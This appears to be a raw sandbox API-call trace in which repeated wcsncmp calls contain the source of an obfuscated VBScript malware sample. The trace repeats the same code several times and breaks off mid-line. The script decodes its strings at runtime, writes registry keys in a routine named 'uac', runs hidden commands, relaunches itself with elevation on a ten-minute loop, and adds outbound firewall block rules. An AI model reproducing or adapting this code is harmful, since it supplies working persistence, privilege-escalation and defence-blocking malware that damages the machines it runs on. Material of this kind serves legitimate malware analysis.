bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0223.015] wcsncmp (_String1="DJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.015] wcsncmp (_String1="JDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 61 [0223.016] wcsncmp (_String1="DPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0223.016] wcsncmp (_String1="PENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0223.016] wcsncmp (_String1="ENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 